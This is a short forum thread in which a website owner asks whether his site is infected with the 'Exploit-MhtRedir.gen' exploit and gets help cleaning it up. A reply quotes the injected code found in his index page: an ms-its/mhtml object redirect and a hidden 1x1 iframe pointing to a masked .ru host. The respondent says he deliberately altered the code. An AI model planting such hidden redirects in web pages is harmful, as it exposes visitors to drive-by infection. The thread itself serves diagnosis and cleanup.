does my website have Exploit-MhtRedir.gen. ?

  • Thread starter Thread starter abba
  • Start date Start date
A

abba

Someone trying to visit my site wrote me saying my website was infected
with

Exploit-MhtRedir.gen.

The hosting company is closed on Sundays and I will call about this on
Monday
but can anyone confirm this?

www.largeprojections.com

if it helps, this is the server it it running on

SunOS src 5.7 Generic_106541-12 sun4u sparc SUNW,UltraSPARC-IIi-cEngine

Thanks,
Chuck
 
berlin.de:

www.largeprojections.com
Click to expand...


I can see there:
...
</BODY>
</html>
[object data="ms-
its:mhtml:file://C:\\MAIN.MHT!http://***.ru//main.chm::/main.htm
" type="text/x-scriptlet"]
[/object]
[iframe width="1" height="1" src="[URL]http://***.ru/counter.php[/URL]"]

Can't tell what it is but it doesn't "smell good."
BTW, I've mutilated the code fragment.

J
Click to expand...

Well I cleaned that crap out of my index page. Aside from html pages,
are there other places
to clean?

thanks,
Chuck
 
Use an ativirus software and it will be get rid of

HTH
 
berlin.de:

www.largeprojections.com
Click to expand...


I can see there:
...
</BODY>
</html>
[object data="ms-
its:mhtml:file://C:\\MAIN.MHT!http://***.ru//main.chm::/mai
n.htm " type="text/x-scriptlet"]
[/object]
[iframe width="1" height="1"
src="http://***.ru/counter.php"]

Can't tell what it is but it doesn't "smell good."
BTW, I've mutilated the code fragment.

J
Click to expand...

Well I cleaned that crap out of my index page. Aside from
html pages, are there other places
to clean?

thanks,
Chuck
Click to expand...

Well, it would help to know how that crap got there. Perhaps
others will have some ideas.

FWIW, your hosting co. seems to be running Unix/Apache. Talk to
them A.S.A.P.

J
 
Back
Top